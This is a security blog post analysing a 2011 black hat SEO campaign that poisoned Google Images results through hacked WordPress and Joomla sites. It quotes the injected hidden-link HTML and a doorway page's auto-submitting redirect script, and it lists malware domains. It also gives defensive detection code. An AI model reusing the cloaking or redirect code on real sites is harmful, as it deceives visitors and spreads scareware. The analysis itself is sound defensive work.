Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Following the Black Hat SEO Traces

   14 Aug 11   Filed in Tips and Tricks, Website exploits

This is a follow-up to last week’s post about hacked WordPress blogs and poisoned Google Images search results. Cyber-criminals infiltrated 4,000+ self-hosted WP blogs and created doorway pages that redirected visitors coming from Google Images search to scareware sites. A few days ago I posted a short update to let you know that Google had removed the doorway pages from its index. I also promised to share some new interesting details about that black hat SEO campaign. So here we go!

Cloaked links

To have Google discover and index rogue doorway pages, the attackers needed to place links on web pages that Google already knows about and regularly crawls. One popular approach is to create free websites and post links there (many services allow you to do this). However, in this particular case I couldn’t find such external links.

Then I checked cached versions of legitimate web pages on the hacked sites and found the following code right before the closing </body> tag.

<style>#alkg {position:absolute;overflow:auto;height:0;width:0;}</style><font id="alkg"><a href="http://example.com/?ccc=niger-culture-picture">niger culture picture</a><br />...<a href="http://example.com/?ccc=eric-ogbogu-picture">eric ogbogu picture</a><br /><a href="http://rankexplorer.com">Poker Software</a></font>

The code cannot be found if you open the same web page in a browser. This means that hackers used cloaking to feed these links to search engine spiders only.
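A rough way to automate this comparison is to diff the links in the crawler-facing copy of a page (for example, the cached version) against the links in the copy a browser receives. The sketch below assumes you have already saved both versions as strings; the function names are made up for illustration.

```python
from html.parser import HTMLParser


class LinkCollector(HTMLParser):
    """Collects the href value of every <a> tag in a document."""

    def __init__(self):
        super().__init__()
        self.hrefs = set()

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.add(href)


def extract_links(html):
    """Return the set of link targets found in an HTML string."""
    collector = LinkCollector()
    collector.feed(html)
    return collector.hrefs


def cloaked_links(crawler_html, browser_html):
    """Links present in the crawler copy but missing from the browser copy."""
    return extract_links(crawler_html) - extract_links(browser_html)
```

Any link that shows up only in the crawler copy deserves a closer look, although pages with dynamic content can also differ between requests for innocent reasons.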

This code defines an invisible style (height:0; width:0) and then lists dozens to hundreds of links to doorway pages on that site inside the <font> block that has that invisible style. The name of that style is a random combination of four letters and it changes from site to site.
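Since the style name changes from site to site, searching for a fixed string will not find these blocks. A minimal sketch of a more generic check, assuming the same layout as above (a CSS rule for an id with zero height and width, followed by an element carrying that id), could look like this. The regular expressions are deliberately simple and will miss variations such as nested tags of the same type.

```python
import re

# Matches a CSS rule such as "#alkg {position:absolute;...}" and captures
# the id and the rule body.
RULE_RE = re.compile(r"#([A-Za-z][\w-]*)\s*\{([^}]*)\}")


def _is_zero(prop, css_body):
    """True if the rule body sets the given property to 0 (or 0px)."""
    pattern = r"(?<![\w-])%s\s*:\s*0(?:px)?\s*(?:;|$)" % prop
    return re.search(pattern, css_body, re.IGNORECASE) is not None


def zero_size_ids(html):
    """Ids whose CSS rule sets both height and width to zero."""
    return {
        match.group(1)
        for match in RULE_RE.finditer(html)
        if _is_zero("height", match.group(2)) and _is_zero("width", match.group(2))
    }


def hidden_link_blocks(html):
    """Map each zero-size id to the number of links inside its element."""
    result = {}
    for element_id in zero_size_ids(html):
        block_re = re.compile(
            r"<(\w+)\b[^>]*\bid=[\"']%s[\"'][^>]*>(.*?)</\1>" % re.escape(element_id),
            re.DOTALL | re.IGNORECASE,
        )
        match = block_re.search(html)
        if match:
            result[element_id] = len(re.findall(r"<a\s", match.group(2), re.IGNORECASE))
    return result
```

A zero-size element with many links inside is a strong hint, but not proof: some legitimate themes hide elements this way too, so the result is a list of candidates to inspect by hand.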

This trick prevents webmasters from seeing the spammy links when they check cached web pages (unless, of course, they scrutinize the HTML code) and at the same time provides links that don’t look invisible to Googlebot (I guess Google is well aware of such tricks though ;-) ).

The placement of this spammy code makes me think that hackers injected it into the footer.php file of the blogs’ themes. Most likely the actual code is obfuscated (e.g. base64-encoded and decoded at run time with base64_decode, or hidden with some other trick), so check the code right before the </body> tag.
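As a starting point for that check, here is a small sketch that flags lines in a theme file calling PHP functions often seen in obfuscated injections. The list of function names is my assumption, not something confirmed for this particular attack, and legitimate plugins use these functions too, so every hit needs a manual look.

```python
import re

# PHP functions that frequently appear in obfuscated injected code.
# This list is an assumption for illustration, not a complete signature set.
SUSPICIOUS_CALLS = ("base64_decode", "gzinflate", "str_rot13", "eval")

CALL_RE = re.compile(r"\b(%s)\s*\(" % "|".join(SUSPICIOUS_CALLS))


def suspicious_lines(php_source):
    """Return (line_number, function_name) pairs for calls worth reviewing."""
    hits = []
    for number, line in enumerate(php_source.splitlines(), start=1):
        for match in CALL_RE.finditer(line):
            hits.append((number, match.group(1)))
    return hits
```

You could feed it the contents of footer.php (read with open(...).read()) and then inspect the reported lines, paying special attention to anything near the closing </body> tag.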

SEO Anomaly

I noticed one interesting thing. Every link block on every hacked site has a link to rankexplorer .com. The anchor text is always the same: Poker Software.

The domain was registered on February 21st, 2011 and already has PageRank 5. That was very suspicious. Only very popular sites can get PR5 in such a short time. So I decided to check who linked to the rankexplorer site and how seriously those links on the hacked sites contribute to this rapid progress.

Yahoo Site Explorer

First, I checked external backlinks using Yahoo Site Explorer:

[Image: Yahoo Site Explorer]

The report says there are 1,858,186 external links to 7 pages on this site. Impressive!

It was clear that the sites at the top of the list were hacked. But it was not clear how many of those 1,800,000+ links came from hacked sites and whether there were many (or rather any) legitimate links. Moreover, YSE doesn’t distinguish between “doFollow” and “noFollow” links, so it’s hard to use this report to tell which links actually contribute to the high PageRank. (For example, there can be many “noFollow” links from spammy blog comments and forum posts.)

MajesticSEO Site Explorer

So the next step was a more thorough investigation using MajesticSEO Site Explorer. MajesticSEO maintains quite a fresh index (updated 2-3 times a day) and its size is comparable to that of Yahoo (they claim that only Google has a larger index). More importantly, they provide various backlink reports that make it easy to spot interesting patterns and anomalies.

Let’s begin with the Domain Information report:

[Image: Domain Information]

Well, the number of external links here is significantly smaller than in Yahoo Site Explorer. But we should not forget that this is a “fresh index” and we deal with hacked sites that get cleaned up once their webmasters notice the hack.

The useful information here is:

  • very few links are “NoFollow” – 0.3% (so comment and forum spam is not the source)
  • quite a few deleted links (webmasters remove spammy links from hacked sites)
  • the domains/links ratio suggests that multiple pages of the same site link to rankexplorer, which is quite typical for spammy links
  • most of the linking sites reside on different servers and even on different subnetworks (they are not just from one hacked server)

The same report has a “Referring Domains” history graph:

[Image: Referring domains graph]

You can see a spike on July 20th. This matches the beginning of the black hat SEO campaign.

The “Top Pages” report shows that all external links point to the home page only. That’s not typical even for a small site with so many backlinks.

[Image: Top Pages]

The most revealing data can be found in the Top Backlinks report. It provides a list of up to 2,500 referring URLs (Majestic Silver plan) in order of their significance for SEO along with the anchor text (!) of the backlinks.

[Image: Top Backlinks]

Main insights:

  • Out of 2,500 backlinks, 2,426 (97%) have the “poker software” anchor text (this is the anchor text used on the hacked sites).
  • 60 backlinks (2.4%) have the “poker statistics” anchor text. They are hidden links on a few supposedly hacked sites (a different attack though). The spammy code looks like this:
    <div style="display:none"><li><a href="hxxp://rankexplorer .com">Poker Statistics</a></li></div>
  • The remaining 13 links can safely be ignored.
    • One of them comes from Baidu search results (why does MajesticSEO index Baidu SERPs?!)
    • Six “software de poker” and “poker mjukvara” links come from a hacked site that uses some sort of auto-translation, which translated all the spammy links into Spanish and Swedish ;-)
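If you export a backlink report as a list of anchor texts, this kind of breakdown takes only a few lines. The sketch below assumes a plain list of anchor strings as input (the export format itself is not something I can vouch for) and folds case and surrounding whitespace so that “Poker Software” and “poker software” count as the same anchor.

```python
from collections import Counter


def anchor_shares(anchor_texts):
    """Return (anchor, count, percent) tuples, most frequent anchor first."""
    counts = Counter(text.strip().lower() for text in anchor_texts)
    total = sum(counts.values())
    return [
        (anchor, count, round(100.0 * count / total, 1))
        for anchor, count in counts.most_common()
    ]
```

A natural link profile usually shows a long tail of brand names, bare URLs and miscellaneous phrases. A single commercial phrase taking nearly the whole distribution, as it does here (2,426 of 2,500 is about 97%), is the anomaly to look for.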

And finally, the “Referring Domains” report shows that most of the domains can also be found in my list of WordPress sites affected by this black hat SEO attack.

So the backlink analysis clearly shows that rankexplorer .com owes its high PageRank exclusively to black hat techniques.

PageRank vs real SERP positions

Was it worth the effort for rankexplorer? Not that much. If we search for [poker software] or even for ["poker software"] on all major search engines, the rankexplorer is nowhere near the top. The top two Google search results for this query currently link to sites with PageRank 4, and #3 has PR3! As Matt Cutts always says: PageRank is only one of many factors that affect site position in search results.

So were all the spammers’ efforts futile? Not exactly. For some queries (I won’t call them popular) you can find the rankexplorer on the first page of search results. Currently it is #4 for the ["poker statistics analyzer"] query.

An interesting side note: out of all major search engines, Baidu (the #1 search engine in China!) is the most susceptible to rankexplorer’s black hat SEO campaign:

[Image: Baidu]

Previous generation of this campaign

MajesticSEO’s reports helped me find some sites where the injected code and doorway pages were different from those in the attack that I described last week. Moreover, some of the sites were not WordPress blogs. After some additional analysis, I figured out it was a previous generation of the same attack. Here are the details:

Checking cached versions (Google cache) of legitimate pages on the compromised sites, I found familiar cloaked blocks of hidden links that used the style/font trick:

<style>#xhxq {position:absolute;overflow:auto;height:0;width:0;}</style><font id="xhxq"><li><a href="http://example.com/?olg=55680">80s movie posters</a></li>
...skipped..
<a href="hxxp://rankexplorer .com">Poker Software</a>
...skipped..
<li><a href="http://www.example.org/?eea=go.php5">powered by smf best back up software</a></li></font>

However, instead of linking to doorways on the same site, those blocks linked to doorways on multiple third-party sites (usually about 50 unique sites in one block). And the rankexplorer link was in the middle of the block this time.

This cross-linking scheme helped me identify 700+ hacked sites. Most of them can be identified as WordPress blogs, Joomla sites and Zen Cart online stores.
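The idea behind this kind of discovery can be sketched as a breadth-first walk: start from a few known hacked sites, read the hosts in their hidden link blocks, and repeat for every new host. This is only an illustration, not the exact procedure I followed. The get_link_block callback is hypothetical: it stands for whatever returns the hidden block HTML for a host (for example, from a cached copy), or an empty string if none is found.

```python
import re
from collections import deque
from urllib.parse import urlparse

HREF_RE = re.compile(r'href=["\'](https?://[^"\']+)["\']', re.IGNORECASE)


def linked_hosts(link_block_html):
    """Host names of all absolute links in a block of HTML."""
    return {urlparse(url).hostname for url in HREF_RE.findall(link_block_html)}


def expand_hacked_sites(seed_hosts, get_link_block, ignore=frozenset()):
    """Follow hidden cross-links from known hacked hosts to new ones.

    get_link_block(host) is a caller-supplied (hypothetical) function that
    returns the hidden link block found on that host, or "" if there is none.
    Hosts in `ignore` (e.g. the site that benefits from the links) are skipped.
    """
    seen = set(seed_hosts)
    queue = deque(seed_hosts)
    while queue:
        host = queue.popleft()
        for target in linked_hosts(get_link_block(host)):
            if target and target not in seen and target not in ignore:
                seen.add(target)
                queue.append(target)
    return seen
```

The ignore set matters: the promoted site appears in every block but is a beneficiary rather than a victim, so it should not end up in the list of compromised hosts.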

URL patterns

The most common URL patterns of the doorway pages are:

example.com/?[a-z]{3,4}=<random>.<extension>, where <random> is a random combination of letters, digits and hyphens, and <extension> is one of the popular file extensions of web pages (html|htm|shtml|php|php3|php4|php5|phtml|jsp|asp). The extension part can be missing.

Examples:

  • example.co.uk/?mrx=zc-31.html
  • example.com/?jlq=bi5k5.phtml
  • example.de/?pce=9mlbqc.htm
  • example.eu/?tnj=57720.php3
  • example.cl/?slf=9283-upfy

Another popular doorway URL pattern is example.org/[a-z]{3}-<keywords>.<extension>, where <keywords> are hyphen separated keywords targeted by the doorway page.

Examples:

  • example.com/qlv-wallpapers-cowgirl-stock-photos.asp (note, this page is on a Linux server that has no ASP)
  • example.net/qxr-trail-of-tears-coloring-pages.php5
  • example.se/lck-multiplication-chart-1-500.html

And the combination of the above two patterns: example.net/?[a-z]{3,4}=<keywords>.<extension>

  • example.org/?jyw=make-your-own-art-online.php4
  • example.com/?liz=sample-1023-arts-organization.shtml
  • example.net/?klb=dem-mac-martial-arts.php
  • example.es/?jys=art-of-8000-bce-500-ce
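These patterns translate fairly directly into regular expressions, which can be handy for grepping access logs or site: search results. The sketch below is based only on the example URLs listed above, and the function name is made up. The patterns are loose, so expect false positives: an ordinary WordPress query such as ?cat=5 or a page named /the-news.html would also match, which means hits are candidates to review, not verdicts.

```python
import re
from urllib.parse import urlsplit

EXT = r"(?:html|htm|shtml|php|php3|php4|php5|phtml|jsp|asp)"

# ?xyz=<random or keywords>, optionally followed by .<extension>
QUERY_RE = re.compile(r"[a-z]{3,4}=[a-z0-9-]+(?:\.%s)?" % EXT)
# /xyz-<keywords>.<extension>
PATH_RE = re.compile(r"/[a-z]{3}-[a-z0-9-]+\.%s" % EXT)


def looks_like_doorway(url):
    """True if the URL matches one of the doorway patterns described above."""
    if "://" not in url:
        url = "http://" + url  # urlsplit needs a scheme to find the host
    parts = urlsplit(url)
    if parts.path in ("", "/") and QUERY_RE.fullmatch(parts.query):
        return True
    return not parts.query and PATH_RE.fullmatch(parts.path) is not None
```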

Chronology of the attack

Some of the websites have already been cleaned up. On such sites, I can only find the spammy content in cached copies that are 2-3 months old, which suggests that this attack was active around May 2011. We can find more evidence of this in the MajesticSEO report for the notorious rankexplorer .com site that uses its “historic” index.

[Image: Historic index]

This graph shows that MajesticSEO began to index links to rankexplorer .com (and we know they all come from hacked sites) in April. Then there was a peak in May (newly indexed domains referencing rankexplorer), almost no new domains in June, and then another uptrend in July (which corresponds to the attack against WordPress blogs that I described last week).

Still malicious

Although that wave of the black hat SEO campaign has been idle for at least a couple of months now, many of the compromised sites still contain malicious web pages. As in the most recent attack, they only redirect visitors to scareware sites if they come from Google Images search (clicking on web search results won’t trigger the redirect.)

Redirects

For visitors from Google Images, the doorway generates a page with an invisible form and JavaScript that automatically clicks the form button, which effectively redirects the browser to a fake AV site:

<html><head>
<script>
function TDov(){setTi meout('ob()', 1);document.getElementById('go').click();}
function F99FAEE4E1A331A7595932B7C18F9F5F6(){try{history.forward();}catch(e){}setTim eout('ob()', 10);}
</script>
</head><body onLoad='TDov()'>
<form action='hxxp://atomiccanyon .com/BrightonFestival2009/xmlrpc.php?k=fredericksburg+tx+historic+district+map&s=google&r=http%3A%2F%2Fwww.google.com%2Fimgres%3Fimgurl%3...skipped..' method='POST' target='_top'>
<button type='submit' id='go' style='visibility:hidden'></button></form>
</body></html>

As you can see, the URL structure resembles the structure of the first URL in the redirect chain of the ongoing attack.

Some of the sites also use a similar form URL on the cricketfunde .com domain.

Then, this intermediary URL redirects visitors to actual fake AV sites. Currently, they use multiple *.rr.nu domains:

  • hxxp://www4.powersecurityex .rr .nu/?hch86z0i65=jNjRnHOtYpxcpdnTtJiY59nPst…
  • hxxp://www3. powergcjsentinel .rr .nu/?39gnl9=V67Q0qlrqKad1dvLoJ2Z2eLgpqCWoWie…
  • hxxp://www1 .simplecwahscanner .rr .nu/2dgnv5l5k?4h6xtulyq2=WNKj2%….

They seem to change every day. Old domains expire quite quickly. When I last checked, they used the 79 .133 .196 .117 address.

Malware

The binary download begins from a different (although similar) domain:

  • hxxp://www2 .thebest-mhcleaner .rr .nu/duqr211_323.php?xw0lonwp=nOGdz%2B…%3D%3D
  • hxxp://www2 .bestsuitehri .rr .nu/yvbt211_323.php?o5aayuuvor=k63E0Lbu…%3D%3D

The downloaded files have names like fix_pack107d_323.exe and fix_pack211d_323.exe (links to VirusTotal reports) and their detection rates are usually less than 30%. I rechecked one file 20 hours later and its detection rate had improved from 27% to 33%. By that time the malicious server had begun to serve a different variation of the same file.

Redirects for Macs

For Mac users, the redirect chain is different:

www4 .powersecurityex .rr .nu -> rdr .cz .cc/go.php?7&said=323 -> www .moviedir .com/1093251

By the way, the moviedir site has Google PageRank 4. And it shouldn’t be a surprise that many of its backlinks are from hacked sites.

Google strikes back

While hacked sites still contain malicious code and may redirect Image searches to dangerous sites, Google has done a great job of mitigating the problem and has removed the doorway pages from its index.

I checked many hacked sites using the site: operator in Google search. Only very few of them had indexed doorways. And even when I could find links to doorways in web search results, Image search results for the same sites were free from poisoned images! (I have a feeling that for some hacked sites Google removed legitimate images as well)

I have also noticed the “This site may be compromised” warning on search results for home pages of many hacked sites.

At this time, both generations of this particular Google Image poisoning campaign seem to be neutralized by Google. Good job!

##
Removing poisoned links from search results doesn’t completely solve the problem. There are still thousands of compromised sites that criminals can reuse for different attacks. Moreover, I still don’t have reliable information about the attack vector (what security holes hackers exploit and how they integrate malicious code into legitimate websites), so millions of WordPress blogs and Joomla sites are potentially vulnerable to similar attacks. If you have any information, please share it in the comments or contact me directly.

If you work in a security department of a large shared hosting provider, please contact me. The chances are I know some compromised sites on your servers (5,000+ sites on my list, typically 1-2 sites per IP, but sometimes up to 300). Together we can find out what’s going on.

Thank you!


Reader's Comments (6)

  1. |

    http://www.rankexplorer is doing illegal way of linking. He’s using a plugin to inject his backlinks.

    Try to install this plugin:
    Email Subscription Box After Post Content

    In an instant, you will have 248 OUTBOUND links including http://www.rankexplorer.

    He must be punished.

  2. |

    Check out this link for how the wordpress sites were (probably) hacked.

    http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

  3. |

    I got hacked by this virus ,re-installed wordpress and it disappeared ,but I think that some files are still infected and don’t know how to fix them, I got 100+ blogs at that host and fix them all fully with hands would be too hard.. if someone know how to fix it ,please write here a comment

    • |

      1. Export backup of blog

      2. FTP download copy of uploads folder (youll need the images later)

      3. Terminate account via cpanel

      4a. Re-create account and fresh install blog.

      4b. DO NOT USE ‘admin’ as user name. Choose ANY other user-name.

      4c. Use a different password.

      5. Import files *import should be assigned to new user name, not the old one.

      6. Youll have to re-upload images into each page because they must populate in database. Simply uploading the uploads folder wont work.

      7. Deactivate ANY and ALL plugins not in use.

      *I was hot three times on seperate sites. This is the fastest way to correct the problem.

      • |

        Important: It is not enough to deactivate ANY and ALL plugins (themes, etc.) not in use. If they are still on your server (even deactivated) they can still be exploited. – Remove everything that you don’t use.

  4. |

    This is one of best ‘straight and clear’ articles which I wrote in last few months. This is not an empty words. Speaking th etruth, knowledge from this sites, can be implemented both ways (as usual): to prevent own sites / clients sites through analysis…or to learn more and implement blackhat techniques.

    I know where I’m standing for. So, it is useful for preventing, for me :)